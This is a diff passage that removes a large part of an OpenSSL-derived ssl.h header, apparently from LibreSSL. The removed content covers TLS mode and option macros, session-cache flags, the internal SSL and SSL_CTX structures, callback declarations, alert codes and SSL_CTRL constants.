-/* Save RAM by releasing read and write buffers when they're empty. (SSL3 and
- * TLS only.)  "Released" buffers are put onto a free-list in the context
- * or just freed (depending on the context's setting for freelist_max_len). */
-#define SSL_MODE_RELEASE_BUFFERS 0x00000010L
-
-/* Note: SSL[_CTX]_set_{options,mode} use |= op on the previous value,
- * they cannot be used to clear bits. */
-
-#define SSL_CTX_set_options(ctx,op) \
-	SSL_CTX_ctrl((ctx),SSL_CTRL_OPTIONS,(op),NULL)
-#define SSL_CTX_clear_options(ctx,op) \
-	SSL_CTX_ctrl((ctx),SSL_CTRL_CLEAR_OPTIONS,(op),NULL)
-#define SSL_CTX_get_options(ctx) \
-	SSL_CTX_ctrl((ctx),SSL_CTRL_OPTIONS,0,NULL)
-#define SSL_set_options(ssl,op) \
-	SSL_ctrl((ssl),SSL_CTRL_OPTIONS,(op),NULL)
-#define SSL_clear_options(ssl,op) \
-	SSL_ctrl((ssl),SSL_CTRL_CLEAR_OPTIONS,(op),NULL)
-#define SSL_get_options(ssl) \
-        SSL_ctrl((ssl),SSL_CTRL_OPTIONS,0,NULL)
-
-#define SSL_CTX_set_mode(ctx,op) \
-	SSL_CTX_ctrl((ctx),SSL_CTRL_MODE,(op),NULL)
-#define SSL_CTX_clear_mode(ctx,op) \
-	SSL_CTX_ctrl((ctx),SSL_CTRL_CLEAR_MODE,(op),NULL)
-#define SSL_CTX_get_mode(ctx) \
-	SSL_CTX_ctrl((ctx),SSL_CTRL_MODE,0,NULL)
-#define SSL_clear_mode(ssl,op) \
-	SSL_ctrl((ssl),SSL_CTRL_CLEAR_MODE,(op),NULL)
-#define SSL_set_mode(ssl,op) \
-	SSL_ctrl((ssl),SSL_CTRL_MODE,(op),NULL)
-#define SSL_get_mode(ssl) \
-        SSL_ctrl((ssl),SSL_CTRL_MODE,0,NULL)
-#define SSL_set_mtu(ssl, mtu) \
-        SSL_ctrl((ssl),SSL_CTRL_SET_MTU,(mtu),NULL)
-
-#define SSL_get_secure_renegotiation_support(ssl) \
-	SSL_ctrl((ssl), SSL_CTRL_GET_RI_SUPPORT, 0, NULL)
-
-void SSL_CTX_set_msg_callback(SSL_CTX *ctx, void (*cb)(int write_p,
-    int version, int content_type, const void *buf, size_t len, SSL *ssl,
-    void *arg));
-void SSL_set_msg_callback(SSL *ssl, void (*cb)(int write_p, int version,
-    int content_type, const void *buf, size_t len, SSL *ssl, void *arg));
-#define SSL_CTX_set_msg_callback_arg(ctx, arg) SSL_CTX_ctrl((ctx), SSL_CTRL_SET_MSG_CALLBACK_ARG, 0, (arg))
-#define SSL_set_msg_callback_arg(ssl, arg) SSL_ctrl((ssl), SSL_CTRL_SET_MSG_CALLBACK_ARG, 0, (arg))
-
-struct ssl_aead_ctx_st;
-typedef struct ssl_aead_ctx_st SSL_AEAD_CTX;
-
-#define SSL_MAX_CERT_LIST_DEFAULT 1024*100 /* 100k max cert list :-) */
-
-#define SSL_SESSION_CACHE_MAX_SIZE_DEFAULT	(1024*20)
-
-/* This callback type is used inside SSL_CTX, SSL, and in the functions that set
- * them. It is used to override the generation of SSL/TLS session IDs in a
- * server. Return value should be zero on an error, non-zero to proceed. Also,
- * callbacks should themselves check if the id they generate is unique otherwise
- * the SSL handshake will fail with an error - callbacks can do this using the
- * 'ssl' value they're passed by;
- *      SSL_has_matching_session_id(ssl, id, *id_len)
- * The length value passed in is set at the maximum size the session ID can be.
- * In SSLv2 this is 16 bytes, whereas SSLv3/TLSv1 it is 32 bytes. The callback
- * can alter this length to be less if desired, but under SSLv2 session IDs are
- * supposed to be fixed at 16 bytes so the id will be padded after the callback
- * returns in this case. It is also an error for the callback to set the size to
- * zero. */
-typedef int (*GEN_SESSION_CB)(const SSL *ssl, unsigned char *id,
-    unsigned int *id_len);
-
-typedef struct ssl_comp_st SSL_COMP;
-
-#ifndef OPENSSL_NO_SSL_INTERN
-
-struct ssl_comp_st {
-	int id;
-	const char *name;
-};
-
-DECLARE_STACK_OF(SSL_COMP)
-struct lhash_st_SSL_SESSION {
-	int dummy;
-};
-
-struct ssl_ctx_internal_st;
-
-struct ssl_ctx_st {
-	const SSL_METHOD *method;
-
-	STACK_OF(SSL_CIPHER) *cipher_list;
-
-	struct x509_store_st /* X509_STORE */ *cert_store;
-
-	/* If timeout is not 0, it is the default timeout value set
-	 * when SSL_new() is called.  This has been put in to make
-	 * life easier to set things up */
-	long session_timeout;
-
-	int references;
-
-	/* Default values to use in SSL structures follow (these are copied by SSL_new) */
-
-	STACK_OF(X509) *extra_certs;
-
-	int verify_mode;
-	unsigned int sid_ctx_length;
-	unsigned char sid_ctx[SSL_MAX_SID_CTX_LENGTH];
-
-	X509_VERIFY_PARAM *param;
-
-	/*
-	 * XXX
-	 * default_passwd_cb used by python and openvpn, need to keep it until we
-	 * add an accessor
-	 */
-	/* Default password callback. */
-	pem_password_cb *default_passwd_callback;
-
-	/* Default password callback user data. */
-	void *default_passwd_callback_userdata;
-
-	struct ssl_ctx_internal_st *internal;
-};
-
-#endif
-
-#define SSL_SESS_CACHE_OFF			0x0000
-#define SSL_SESS_CACHE_CLIENT			0x0001
-#define SSL_SESS_CACHE_SERVER			0x0002
-#define SSL_SESS_CACHE_BOTH	(SSL_SESS_CACHE_CLIENT|SSL_SESS_CACHE_SERVER)
-#define SSL_SESS_CACHE_NO_AUTO_CLEAR		0x0080
-/* enough comments already ... see SSL_CTX_set_session_cache_mode(3) */
-#define SSL_SESS_CACHE_NO_INTERNAL_LOOKUP	0x0100
-#define SSL_SESS_CACHE_NO_INTERNAL_STORE	0x0200
-#define SSL_SESS_CACHE_NO_INTERNAL \
-	(SSL_SESS_CACHE_NO_INTERNAL_LOOKUP|SSL_SESS_CACHE_NO_INTERNAL_STORE)
-
-struct lhash_st_SSL_SESSION *SSL_CTX_sessions(SSL_CTX *ctx);
-#define SSL_CTX_sess_number(ctx) \
-	SSL_CTX_ctrl(ctx,SSL_CTRL_SESS_NUMBER,0,NULL)
-#define SSL_CTX_sess_connect(ctx) \
-	SSL_CTX_ctrl(ctx,SSL_CTRL_SESS_CONNECT,0,NULL)
-#define SSL_CTX_sess_connect_good(ctx) \
-	SSL_CTX_ctrl(ctx,SSL_CTRL_SESS_CONNECT_GOOD,0,NULL)
-#define SSL_CTX_sess_connect_renegotiate(ctx) \
-	SSL_CTX_ctrl(ctx,SSL_CTRL_SESS_CONNECT_RENEGOTIATE,0,NULL)
-#define SSL_CTX_sess_accept(ctx) \
-	SSL_CTX_ctrl(ctx,SSL_CTRL_SESS_ACCEPT,0,NULL)
-#define SSL_CTX_sess_accept_renegotiate(ctx) \
-	SSL_CTX_ctrl(ctx,SSL_CTRL_SESS_ACCEPT_RENEGOTIATE,0,NULL)
-#define SSL_CTX_sess_accept_good(ctx) \
-	SSL_CTX_ctrl(ctx,SSL_CTRL_SESS_ACCEPT_GOOD,0,NULL)
-#define SSL_CTX_sess_hits(ctx) \
-	SSL_CTX_ctrl(ctx,SSL_CTRL_SESS_HIT,0,NULL)
-#define SSL_CTX_sess_cb_hits(ctx) \
-	SSL_CTX_ctrl(ctx,SSL_CTRL_SESS_CB_HIT,0,NULL)
-#define SSL_CTX_sess_misses(ctx) \
-	SSL_CTX_ctrl(ctx,SSL_CTRL_SESS_MISSES,0,NULL)
-#define SSL_CTX_sess_timeouts(ctx) \
-	SSL_CTX_ctrl(ctx,SSL_CTRL_SESS_TIMEOUTS,0,NULL)
-#define SSL_CTX_sess_cache_full(ctx) \
-	SSL_CTX_ctrl(ctx,SSL_CTRL_SESS_CACHE_FULL,0,NULL)
-
-void SSL_CTX_sess_set_new_cb(SSL_CTX *ctx,
-    int (*new_session_cb)(struct ssl_st *ssl, SSL_SESSION *sess));
-int (*SSL_CTX_sess_get_new_cb(SSL_CTX *ctx))(struct ssl_st *ssl,
-    SSL_SESSION *sess);
-void SSL_CTX_sess_set_remove_cb(SSL_CTX *ctx,
-    void (*remove_session_cb)(struct ssl_ctx_st *ctx, SSL_SESSION *sess));
-void (*SSL_CTX_sess_get_remove_cb(SSL_CTX *ctx))(struct ssl_ctx_st *ctx,
-    SSL_SESSION *sess);
-void SSL_CTX_sess_set_get_cb(SSL_CTX *ctx,
-    SSL_SESSION *(*get_session_cb)(struct ssl_st *ssl, unsigned char *data,
-    int len, int *copy));
-SSL_SESSION *(*SSL_CTX_sess_get_get_cb(SSL_CTX *ctx))(struct ssl_st *ssl,
-    unsigned char *Data, int len, int *copy);
-void SSL_CTX_set_info_callback(SSL_CTX *ctx, void (*cb)(const SSL *ssl,
-    int type, int val));
-void (*SSL_CTX_get_info_callback(SSL_CTX *ctx))(const SSL *ssl, int type,
-    int val);
-void SSL_CTX_set_client_cert_cb(SSL_CTX *ctx,
-    int (*client_cert_cb)(SSL *ssl, X509 **x509, EVP_PKEY **pkey));
-int (*SSL_CTX_get_client_cert_cb(SSL_CTX *ctx))(SSL *ssl, X509 **x509,
-    EVP_PKEY **pkey);
-#ifndef OPENSSL_NO_ENGINE
-int SSL_CTX_set_client_cert_engine(SSL_CTX *ctx, ENGINE *e);
-#endif
-void SSL_CTX_set_cookie_generate_cb(SSL_CTX *ctx,
-    int (*app_gen_cookie_cb)(SSL *ssl, unsigned char *cookie,
-    unsigned int *cookie_len));
-void SSL_CTX_set_cookie_verify_cb(SSL_CTX *ctx,
-    int (*app_verify_cookie_cb)(SSL *ssl, unsigned char *cookie,
-    unsigned int cookie_len));
-void SSL_CTX_set_next_protos_advertised_cb(SSL_CTX *s, int (*cb)(SSL *ssl,
-    const unsigned char **out, unsigned int *outlen, void *arg), void *arg);
-void SSL_CTX_set_next_proto_select_cb(SSL_CTX *s, int (*cb)(SSL *ssl,
-    unsigned char **out, unsigned char *outlen, const unsigned char *in,
-    unsigned int inlen, void *arg), void *arg);
-
-int SSL_select_next_proto(unsigned char **out, unsigned char *outlen,
-    const unsigned char *in, unsigned int inlen, const unsigned char *client,
-    unsigned int client_len);
-void SSL_get0_next_proto_negotiated(const SSL *s, const unsigned char **data,
-    unsigned *len);
-
-#define OPENSSL_NPN_UNSUPPORTED	0
-#define OPENSSL_NPN_NEGOTIATED	1
-#define OPENSSL_NPN_NO_OVERLAP	2
-
-int SSL_CTX_set_alpn_protos(SSL_CTX *ctx, const unsigned char *protos,
-    unsigned int protos_len);
-int SSL_set_alpn_protos(SSL *ssl, const unsigned char *protos,
-    unsigned int protos_len);
-void SSL_CTX_set_alpn_select_cb(SSL_CTX *ctx,
-    int (*cb)(SSL *ssl, const unsigned char **out, unsigned char *outlen,
-    const unsigned char *in, unsigned int inlen, void *arg), void *arg);
-void SSL_get0_alpn_selected(const SSL *ssl, const unsigned char **data,
-    unsigned int *len);
-
-#define SSL_NOTHING	1
-#define SSL_WRITING	2
-#define SSL_READING	3
-#define SSL_X509_LOOKUP	4
-
-/* These will only be used when doing non-blocking IO */
-#define SSL_want_nothing(s)	(SSL_want(s) == SSL_NOTHING)
-#define SSL_want_read(s)	(SSL_want(s) == SSL_READING)
-#define SSL_want_write(s)	(SSL_want(s) == SSL_WRITING)
-#define SSL_want_x509_lookup(s)	(SSL_want(s) == SSL_X509_LOOKUP)
-
-#define SSL_MAC_FLAG_READ_MAC_STREAM 1
-#define SSL_MAC_FLAG_WRITE_MAC_STREAM 2
-
-#ifndef OPENSSL_NO_SSL_INTERN
-struct ssl_internal_st;
-
-struct ssl_st {
-	/* protocol version
-	 * (one of SSL2_VERSION, SSL3_VERSION, TLS1_VERSION, DTLS1_VERSION)
-	 */
-	int version;
-
-	const SSL_METHOD *method; /* SSLv3 */
-
-	/* There are 2 BIO's even though they are normally both the
-	 * same.  This is so data can be read and written to different
-	 * handlers */
-
-	BIO *rbio; /* used by SSL_read */
-	BIO *wbio; /* used by SSL_write */
-	BIO *bbio; /* used during session-id reuse to concatenate
-		    * messages */
-	int server;	/* are we the server side? - mostly used by SSL_clear*/
-
-	struct ssl3_state_st *s3; /* SSLv3 variables */
-	struct dtls1_state_st *d1; /* DTLSv1 variables */
-
-	X509_VERIFY_PARAM *param;
-
-	/* crypto */
-	STACK_OF(SSL_CIPHER) *cipher_list;
-
-	/* This is used to hold the server certificate used */
-	struct cert_st /* CERT */ *cert;
-
-	/* the session_id_context is used to ensure sessions are only reused
-	 * in the appropriate context */
-	unsigned int sid_ctx_length;
-	unsigned char sid_ctx[SSL_MAX_SID_CTX_LENGTH];
-
-	/* This can also be in the session once a session is established */
-	SSL_SESSION *session;
-
-	/* Used in SSL2 and SSL3 */
-	int verify_mode;	/* 0 don't care about verify failure.
-				 * 1 fail if verify fails */
-	int error;		/* error bytes to be written */
-	int error_code;		/* actual code */
-
-	SSL_CTX *ctx;
-
-	long verify_result;
-
-	int references;
-
-	int client_version;	/* what was passed, used for
-				 * SSLv3/TLS rollback check */
-
-	unsigned int max_send_fragment;
-
-	char *tlsext_hostname;
-
-	/* certificate status request info */
-	/* Status type or -1 if no status type */
-	int tlsext_status_type;
-
-	SSL_CTX * initial_ctx; /* initial ctx, used to store sessions */
-#define session_ctx initial_ctx
-
-	/*
-	 * XXX really should be internal, but is
-	 * touched unnaturally by wpa-supplicant
-	 * and freeradius and other perversions
-	 */
-	EVP_CIPHER_CTX *enc_read_ctx;		/* cryptographic state */
-	EVP_MD_CTX *read_hash;			/* used for mac generation */
-
-	struct ssl_internal_st *internal;
-};
-
-#endif
-
-#ifdef __cplusplus
-}
-#endif
-
-#include <openssl/ssl2.h>
-#include <openssl/ssl3.h>
-#include <openssl/tls1.h>	/* This is mostly sslv3 with a few tweaks */
-#include <openssl/dtls1.h>	/* Datagram TLS */
-#include <openssl/ssl23.h>
-#include <openssl/srtp.h>	/* Support for the use_srtp extension */
-
-#ifdef  __cplusplus
-extern "C" {
-#endif
-
-/* compatibility */
-#define SSL_set_app_data(s,arg)		(SSL_set_ex_data(s,0,(char *)arg))
-#define SSL_get_app_data(s)		(SSL_get_ex_data(s,0))
-#define SSL_SESSION_set_app_data(s,a)	(SSL_SESSION_set_ex_data(s,0,(char *)a))
-#define SSL_SESSION_get_app_data(s)	(SSL_SESSION_get_ex_data(s,0))
-#define SSL_CTX_get_app_data(ctx)	(SSL_CTX_get_ex_data(ctx,0))
-#define SSL_CTX_set_app_data(ctx,arg)	(SSL_CTX_set_ex_data(ctx,0,(char *)arg))
-
-/* The following are the possible values for ssl->state are are
- * used to indicate where we are up to in the SSL connection establishment.
- * The macros that follow are about the only things you should need to use
- * and even then, only when using non-blocking IO.
- * It can also be useful to work out where you were when the connection
- * failed */
-
-#define SSL_ST_CONNECT			0x1000
-#define SSL_ST_ACCEPT			0x2000
-#define SSL_ST_MASK			0x0FFF
-#define SSL_ST_INIT			(SSL_ST_CONNECT|SSL_ST_ACCEPT)
-#define SSL_ST_BEFORE			0x4000
-#define SSL_ST_OK			0x03
-#define SSL_ST_RENEGOTIATE		(0x04|SSL_ST_INIT)
-
-#define SSL_CB_LOOP			0x01
-#define SSL_CB_EXIT			0x02
-#define SSL_CB_READ			0x04
-#define SSL_CB_WRITE			0x08
-#define SSL_CB_ALERT			0x4000 /* used in callback */
-#define SSL_CB_READ_ALERT		(SSL_CB_ALERT|SSL_CB_READ)
-#define SSL_CB_WRITE_ALERT		(SSL_CB_ALERT|SSL_CB_WRITE)
-#define SSL_CB_ACCEPT_LOOP		(SSL_ST_ACCEPT|SSL_CB_LOOP)
-#define SSL_CB_ACCEPT_EXIT		(SSL_ST_ACCEPT|SSL_CB_EXIT)
-#define SSL_CB_CONNECT_LOOP		(SSL_ST_CONNECT|SSL_CB_LOOP)
-#define SSL_CB_CONNECT_EXIT		(SSL_ST_CONNECT|SSL_CB_EXIT)
-#define SSL_CB_HANDSHAKE_START		0x10
-#define SSL_CB_HANDSHAKE_DONE		0x20
-
-/* Is the SSL_connection established? */
-#define SSL_get_state(a)		(SSL_state((a)))
-#define SSL_is_init_finished(a)		(SSL_state((a)) == SSL_ST_OK)
-#define SSL_in_init(a)			(SSL_state((a))&SSL_ST_INIT)
-#define SSL_in_before(a)		(SSL_state((a))&SSL_ST_BEFORE)
-#define SSL_in_connect_init(a)		(SSL_state((a))&SSL_ST_CONNECT)
-#define SSL_in_accept_init(a)		(SSL_state((a))&SSL_ST_ACCEPT)
-
-/* The following 2 states are kept in ssl->rstate when reads fail,
- * you should not need these */
-#define SSL_ST_READ_HEADER		0xF0
-#define SSL_ST_READ_BODY		0xF1
-#define SSL_ST_READ_DONE		0xF2
-
-/* Obtain latest Finished message
- *   -- that we sent (SSL_get_finished)
- *   -- that we expected from peer (SSL_get_peer_finished).
- * Returns length (0 == no Finished so far), copies up to 'count' bytes. */
-size_t SSL_get_finished(const SSL *s, void *buf, size_t count);
-size_t SSL_get_peer_finished(const SSL *s, void *buf, size_t count);
-
-/* use either SSL_VERIFY_NONE or SSL_VERIFY_PEER, the last 2 options
- * are 'ored' with SSL_VERIFY_PEER if they are desired */
-#define SSL_VERIFY_NONE			0x00
-#define SSL_VERIFY_PEER			0x01
-#define SSL_VERIFY_FAIL_IF_NO_PEER_CERT	0x02
-#define SSL_VERIFY_CLIENT_ONCE		0x04
-
-#define OpenSSL_add_ssl_algorithms()	SSL_library_init()
-#define SSLeay_add_ssl_algorithms()	SSL_library_init()
-
-/* More backward compatibility */
-#define SSL_get_cipher(s) \
-		SSL_CIPHER_get_name(SSL_get_current_cipher(s))
-#define SSL_get_cipher_bits(s,np) \
-		SSL_CIPHER_get_bits(SSL_get_current_cipher(s),np)
-#define SSL_get_cipher_version(s) \
-		SSL_CIPHER_get_version(SSL_get_current_cipher(s))
-#define SSL_get_cipher_name(s) \
-		SSL_CIPHER_get_name(SSL_get_current_cipher(s))
-#define SSL_get_time(a)		SSL_SESSION_get_time(a)
-#define SSL_set_time(a,b)	SSL_SESSION_set_time((a),(b))
-#define SSL_get_timeout(a)	SSL_SESSION_get_timeout(a)
-#define SSL_set_timeout(a,b)	SSL_SESSION_set_timeout((a),(b))
-
-#define d2i_SSL_SESSION_bio(bp,s_id) ASN1_d2i_bio_of(SSL_SESSION,SSL_SESSION_new,d2i_SSL_SESSION,bp,s_id)
-#define i2d_SSL_SESSION_bio(bp,s_id) ASN1_i2d_bio_of(SSL_SESSION,i2d_SSL_SESSION,bp,s_id)
-
-SSL_SESSION *PEM_read_bio_SSL_SESSION(BIO *bp, SSL_SESSION **x,
-    pem_password_cb *cb, void *u);
-SSL_SESSION *PEM_read_SSL_SESSION(FILE *fp, SSL_SESSION **x,
-    pem_password_cb *cb, void *u);
-int PEM_write_bio_SSL_SESSION(BIO *bp, SSL_SESSION *x);
-int PEM_write_SSL_SESSION(FILE *fp, SSL_SESSION *x);
-
-#define SSL_AD_REASON_OFFSET		1000 /* offset to get SSL_R_... value from SSL_AD_... */
-
-/* These alert types are for SSLv3 and TLSv1 */
-#define SSL_AD_CLOSE_NOTIFY		SSL3_AD_CLOSE_NOTIFY
-#define SSL_AD_UNEXPECTED_MESSAGE	SSL3_AD_UNEXPECTED_MESSAGE /* fatal */
-#define SSL_AD_BAD_RECORD_MAC		SSL3_AD_BAD_RECORD_MAC     /* fatal */
-#define SSL_AD_DECRYPTION_FAILED	TLS1_AD_DECRYPTION_FAILED
-#define SSL_AD_RECORD_OVERFLOW		TLS1_AD_RECORD_OVERFLOW
-#define SSL_AD_DECOMPRESSION_FAILURE	SSL3_AD_DECOMPRESSION_FAILURE/* fatal */
-#define SSL_AD_HANDSHAKE_FAILURE	SSL3_AD_HANDSHAKE_FAILURE/* fatal */
-#define SSL_AD_NO_CERTIFICATE		SSL3_AD_NO_CERTIFICATE /* Not for TLS */
-#define SSL_AD_BAD_CERTIFICATE		SSL3_AD_BAD_CERTIFICATE
-#define SSL_AD_UNSUPPORTED_CERTIFICATE	SSL3_AD_UNSUPPORTED_CERTIFICATE
-#define SSL_AD_CERTIFICATE_REVOKED	SSL3_AD_CERTIFICATE_REVOKED
-#define SSL_AD_CERTIFICATE_EXPIRED	SSL3_AD_CERTIFICATE_EXPIRED
-#define SSL_AD_CERTIFICATE_UNKNOWN	SSL3_AD_CERTIFICATE_UNKNOWN
-#define SSL_AD_ILLEGAL_PARAMETER	SSL3_AD_ILLEGAL_PARAMETER   /* fatal */
-#define SSL_AD_UNKNOWN_CA		TLS1_AD_UNKNOWN_CA	/* fatal */
-#define SSL_AD_ACCESS_DENIED		TLS1_AD_ACCESS_DENIED	/* fatal */
-#define SSL_AD_DECODE_ERROR		TLS1_AD_DECODE_ERROR	/* fatal */
-#define SSL_AD_DECRYPT_ERROR		TLS1_AD_DECRYPT_ERROR
-#define SSL_AD_EXPORT_RESTRICTION	TLS1_AD_EXPORT_RESTRICTION/* fatal */
-#define SSL_AD_PROTOCOL_VERSION		TLS1_AD_PROTOCOL_VERSION /* fatal */
-#define SSL_AD_INSUFFICIENT_SECURITY	TLS1_AD_INSUFFICIENT_SECURITY/* fatal */
-#define SSL_AD_INTERNAL_ERROR		TLS1_AD_INTERNAL_ERROR	/* fatal */
-#define SSL_AD_INAPPROPRIATE_FALLBACK	TLS1_AD_INAPPROPRIATE_FALLBACK /* fatal */
-#define SSL_AD_USER_CANCELLED		TLS1_AD_USER_CANCELLED
-#define SSL_AD_NO_RENEGOTIATION		TLS1_AD_NO_RENEGOTIATION
-#define SSL_AD_UNSUPPORTED_EXTENSION	TLS1_AD_UNSUPPORTED_EXTENSION
-#define SSL_AD_CERTIFICATE_UNOBTAINABLE TLS1_AD_CERTIFICATE_UNOBTAINABLE
-#define SSL_AD_UNRECOGNIZED_NAME	TLS1_AD_UNRECOGNIZED_NAME
-#define SSL_AD_BAD_CERTIFICATE_STATUS_RESPONSE TLS1_AD_BAD_CERTIFICATE_STATUS_RESPONSE
-#define SSL_AD_BAD_CERTIFICATE_HASH_VALUE TLS1_AD_BAD_CERTIFICATE_HASH_VALUE
-#define SSL_AD_UNKNOWN_PSK_IDENTITY	TLS1_AD_UNKNOWN_PSK_IDENTITY /* fatal */
-
-#define SSL_ERROR_NONE			0
-#define SSL_ERROR_SSL			1
-#define SSL_ERROR_WANT_READ		2
-#define SSL_ERROR_WANT_WRITE		3
-#define SSL_ERROR_WANT_X509_LOOKUP	4
-#define SSL_ERROR_SYSCALL		5 /* look at error stack/return value/errno */
-#define SSL_ERROR_ZERO_RETURN		6
-#define SSL_ERROR_WANT_CONNECT		7
-#define SSL_ERROR_WANT_ACCEPT		8
-
-#define SSL_CTRL_NEED_TMP_RSA			1
-#define SSL_CTRL_SET_TMP_RSA			2
-#define SSL_CTRL_SET_TMP_DH			3
-#define SSL_CTRL_SET_TMP_ECDH			4
-#define SSL_CTRL_SET_TMP_RSA_CB			5
-#define SSL_CTRL_SET_TMP_DH_CB			6
-#define SSL_CTRL_SET_TMP_ECDH_CB		7
-
-#define SSL_CTRL_GET_SESSION_REUSED		8
-#define SSL_CTRL_GET_CLIENT_CERT_REQUEST	9
-#define SSL_CTRL_GET_NUM_RENEGOTIATIONS		10
-#define SSL_CTRL_CLEAR_NUM_RENEGOTIATIONS	11
-#define SSL_CTRL_GET_TOTAL_RENEGOTIATIONS	12
-#define SSL_CTRL_GET_FLAGS			13
-#define SSL_CTRL_EXTRA_CHAIN_CERT		14
-
-#define SSL_CTRL_SET_MSG_CALLBACK               15
-#define SSL_CTRL_SET_MSG_CALLBACK_ARG           16
-
-/* only applies to datagram connections */
-#define SSL_CTRL_SET_MTU                17
-/* Stats */
-#define SSL_CTRL_SESS_NUMBER			20
-#define SSL_CTRL_SESS_CONNECT			21
-#define SSL_CTRL_SESS_CONNECT_GOOD		22
-#define SSL_CTRL_SESS_CONNECT_RENEGOTIATE	23
-#define SSL_CTRL_SESS_ACCEPT			24
-#define SSL_CTRL_SESS_ACCEPT_GOOD		25
-#define SSL_CTRL_SESS_ACCEPT_RENEGOTIATE	26
-#define SSL_CTRL_SESS_HIT			27
-#define SSL_CTRL_SESS_CB_HIT			28
-#define SSL_CTRL_SESS_MISSES			29
-#define SSL_CTRL_SESS_TIMEOUTS			30
-#define SSL_CTRL_SESS_CACHE_FULL		31
-#define SSL_CTRL_OPTIONS			32
-#define SSL_CTRL_MODE				33
-
-#define SSL_CTRL_GET_READ_AHEAD			40
-#define SSL_CTRL_SET_READ_AHEAD			41
-#define SSL_CTRL_SET_SESS_CACHE_SIZE		42
-#define SSL_CTRL_GET_SESS_CACHE_SIZE		43
-#define SSL_CTRL_SET_SESS_CACHE_MODE		44
-#define SSL_CTRL_GET_SESS_CACHE_MODE		45
-
-#define SSL_CTRL_GET_MAX_CERT_LIST		50
-#define SSL_CTRL_SET_MAX_CERT_LIST		51
-
-#define SSL_CTRL_SET_MAX_SEND_FRAGMENT		52
-
-/* see tls1.h for macros based on these */
-#define SSL_CTRL_SET_TLSEXT_SERVERNAME_CB	53
-#define SSL_CTRL_SET_TLSEXT_SERVERNAME_ARG	54
-#define SSL_CTRL_SET_TLSEXT_HOSTNAME		55
-#define SSL_CTRL_SET_TLSEXT_DEBUG_CB		56
-#define SSL_CTRL_SET_TLSEXT_DEBUG_ARG		57
-#define SSL_CTRL_GET_TLSEXT_TICKET_KEYS		58
-#define SSL_CTRL_SET_TLSEXT_TICKET_KEYS		59
-#define SSL_CTRL_SET_TLSEXT_STATUS_REQ_CB	63
-#define SSL_CTRL_SET_TLSEXT_STATUS_REQ_CB_ARG	64
-#define SSL_CTRL_SET_TLSEXT_STATUS_REQ_TYPE	65
-#define SSL_CTRL_GET_TLSEXT_STATUS_REQ_EXTS	66
-#define SSL_CTRL_SET_TLSEXT_STATUS_REQ_EXTS	67
-#define SSL_CTRL_GET_TLSEXT_STATUS_REQ_IDS	68
-#define SSL_CTRL_SET_TLSEXT_STATUS_REQ_IDS	69
-#define SSL_CTRL_GET_TLSEXT_STATUS_REQ_OCSP_RESP	70
-#define SSL_CTRL_SET_TLSEXT_STATUS_REQ_OCSP_RESP	71
-
-#define SSL_CTRL_SET_TLSEXT_TICKET_KEY_CB	72
-
-#define SSL_CTRL_SET_TLS_EXT_SRP_USERNAME_CB	75
-#define SSL_CTRL_SET_SRP_VERIFY_PARAM_CB		76
-#define SSL_CTRL_SET_SRP_GIVE_CLIENT_PWD_CB		77
-
-#define SSL_CTRL_SET_SRP_ARG		78
-#define SSL_CTRL_SET_TLS_EXT_SRP_USERNAME		79
-#define SSL_CTRL_SET_TLS_EXT_SRP_STRENGTH		80
-#define SSL_CTRL_SET_TLS_EXT_SRP_PASSWORD		81
-
-#define DTLS_CTRL_GET_TIMEOUT		73
-#define DTLS_CTRL_HANDLE_TIMEOUT	74
-#define DTLS_CTRL_LISTEN			75
-
-#define SSL_CTRL_GET_RI_SUPPORT			76
-#define SSL_CTRL_CLEAR_OPTIONS			77
-#define SSL_CTRL_CLEAR_MODE			78
-
-#define SSL_CTRL_GET_EXTRA_CHAIN_CERTS		82
-#define SSL_CTRL_CLEAR_EXTRA_CHAIN_CERTS	83
-
-#define SSL_CTRL_SET_GROUPS				91
-#define SSL_CTRL_SET_GROUPS_LIST			92
-
-#define SSL_CTRL_SET_ECDH_AUTO			94
-
-#define SSL_CTRL_GET_SERVER_TMP_KEY		109
-
-#define SSL_CTRL_SET_DH_AUTO			118
-
-#define SSL_CTRL_SET_MIN_PROTO_VERSION			123
-#define SSL_CTRL_SET_MAX_PROTO_VERSION			124
-
-#define DTLSv1_get_timeout(ssl, arg) \
-	SSL_ctrl(ssl,DTLS_CTRL_GET_TIMEOUT,0, (void *)arg)
-#define DTLSv1_handle_timeout(ssl) \
-	SSL_ctrl(ssl,DTLS_CTRL_HANDLE_TIMEOUT,0, NULL)
-#define DTLSv1_listen(ssl, peer) \
-	SSL_ctrl(ssl,DTLS_CTRL_LISTEN,0, (void *)peer)
-
-#define SSL_session_reused(ssl) \
-	SSL_ctrl((ssl),SSL_CTRL_GET_SESSION_REUSED,0,NULL)
-#define SSL_num_renegotiations(ssl) \
-	SSL_ctrl((ssl),SSL_CTRL_GET_NUM_RENEGOTIATIONS,0,NULL)
-#define SSL_clear_num_renegotiations(ssl) \
-	SSL_ctrl((ssl),SSL_CTRL_CLEAR_NUM_RENEGOTIATIONS,0,NULL)
-#define SSL_total_renegotiations(ssl) \
-	SSL_ctrl((ssl),SSL_CTRL_GET_TOTAL_RENEGOTIATIONS,0,NULL)
-
-#define SSL_CTX_need_tmp_RSA(ctx) \
-	SSL_CTX_ctrl(ctx,SSL_CTRL_NEED_TMP_RSA,0,NULL)
-#define SSL_CTX_set_tmp_rsa(ctx,rsa) \
-	SSL_CTX_ctrl(ctx,SSL_CTRL_SET_TMP_RSA,0,(char *)rsa)
-#define SSL_CTX_set_tmp_dh(ctx,dh) \
-	SSL_CTX_ctrl(ctx,SSL_CTRL_SET_TMP_DH,0,(char *)dh)
-#define SSL_CTX_set_tmp_ecdh(ctx,ecdh) \
-	SSL_CTX_ctrl(ctx,SSL_CTRL_SET_TMP_ECDH,0,(char *)ecdh)
-#define SSL_CTX_set_dh_auto(ctx, onoff) \
-	SSL_CTX_ctrl(ctx,SSL_CTRL_SET_DH_AUTO,onoff,NULL)
-#define SSL_CTX_set_ecdh_auto(ctx, onoff) \
-	SSL_CTX_ctrl(ctx,SSL_CTRL_SET_ECDH_AUTO,onoff,NULL)
-
-#define SSL_need_tmp_RSA(ssl) \
-	SSL_ctrl(ssl,SSL_CTRL_NEED_TMP_RSA,0,NULL)
-#define SSL_set_tmp_rsa(ssl,rsa) \
-	SSL_ctrl(ssl,SSL_CTRL_SET_TMP_RSA,0,(char *)rsa)
-#define SSL_set_tmp_dh(ssl,dh) \
-	SSL_ctrl(ssl,SSL_CTRL_SET_TMP_DH,0,(char *)dh)
-#define SSL_set_tmp_ecdh(ssl,ecdh) \
-	SSL_ctrl(ssl,SSL_CTRL_SET_TMP_ECDH,0,(char *)ecdh)
